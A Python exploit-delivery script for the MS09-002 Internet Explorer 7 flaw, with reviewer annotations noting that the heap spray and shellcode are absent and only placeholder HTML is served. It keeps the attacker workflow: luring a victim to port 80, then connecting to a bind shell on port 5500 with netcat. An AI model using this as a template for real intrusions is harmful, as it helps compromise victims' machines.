#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002)
###############################################################################
#
# Thanks to str0ke for finding this in the wild.
#
# Tested on Windows 2003 SP2 R2
#
# Written by SecureState R&D Team (ReL1K)
# http://www.securestate.com
#
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind
#
###############################################################################
#
# NOTE(review): what this file actually contains is a minimal Python 2
# (BaseHTTPServer) web server that answers every GET with HTTP 200 and, for
# the site root, a fixed HTML body, while printing operator messages to
# stdout. The HTML written below is placeholder text ("x",
# "Exploit is running...") -- no heap spray, shellcode or trigger appears on
# this page, so the payload the banner describes is not present here. The
# banner's "Tested on Windows 2003 SP2 R2" refers to the host running this
# server, not to the browser version the advisory concerns.

from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys

# Optional JIT; a no-op if psyco is not installed.
try:
    import psyco
    psyco.full()
except ImportError:
    pass


class myRequestHandler(BaseHTTPRequestHandler):
    # NOTE(review): this try/except wraps *def* statements, which cannot raise
    # when the class body executes, so the "except Exception: pass" at the end
    # of the class is dead code. Exceptions raised inside the handlers at
    # request time are NOT caught here; they go to BaseHTTPServer's own
    # error handling.
    try:
        def do_GET(self):
            """Answer every GET with 200; write the fixed HTML body for '/'.

            Side effects: sends the response headers and body on self.wfile,
            and prints the requesting client's address to stdout.
            """
            # Always Accept GET -- headers go out for every path, not just "/".
            self.printCustomHTTPResponse(200)
            # Site root: Main Menu -- any other path gets headers and an empty body.
            if self.path == "/":
                # client_address is (host, port); only the host is echoed below.
                target=self.client_address[0]
                self.wfile.write("""""")
                self.wfile.write("""
x
""")
                # Fixed page title: a stable string a network defender can key
                # on, together with the fixed Server header set below.
                self.wfile.write("""Microsoft Internet Explorer MS09-002 Buffer Overflow""")
                self.wfile.write("""

Exploit is running...


""")
                # Operator message only; the 30-second figure and port 5500
                # come from the banner's payload description, nothing on this
                # page listens on or opens 5500.
                print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]NetCat to IP Address: %s and port 5500 [-]" % (target))
                #print ("[-] Example: open up a command shell and type 'nc %s 5500' [-]" % (target))

        # Print custom HTTP Response
        def printCustomHTTPResponse(self, respcode):
            """Send the status line and fixed headers for *respcode*.

            Always advertises ``Content-type: text/html`` and a hard-coded
            ``Server: myRequestHandler`` header -- a detectable artefact,
            since BaseHTTPServer would otherwise report its own version string.
            """
            self.send_response(respcode)
            self.send_header("Content-type", "text/html")
            self.send_header("Server", "myRequestHandler")
            self.end_headers()

    # In case of exceptions, pass them
    # (see NOTE above: unreachable at class-creation time.)
    except Exception:
        pass


# Binds every interface ('' = 0.0.0.0) on privileged port 80, so this needs
# elevated rights and is reachable by any host that can route to the machine.
httpd = HTTPServer(('', 80), myRequestHandler)

print (""" ############################################################################### MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) ############################################################################### # # # Thanks to Str0ke for finding this in the wild. # # # # Tested on Windows 2003 SP2 R2 # # # # Written by SecureState R&D Team # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ############################################################################### """)
print ("[-] Starting MS Internet Explorer 7 Memory Corruption Exploit:80 [-]")
print ("[-] Have someone connect to you on port 80 [-]")
# "-c" presumably means Ctrl-C, which arrives as the KeyboardInterrupt
# handled below.
print ("Type -c to exit..")

try:
    # handle the connections
    # handle_request() blocks for exactly one request, then serve_forever()
    # takes over; the first request is served the same way either way, so
    # this call is redundant rather than a separate mode.
    httpd.handle_request()
    # Serve HTTP server forever
    httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
    print ("\n\nExiting exploit...\n\n")
    sys.exit()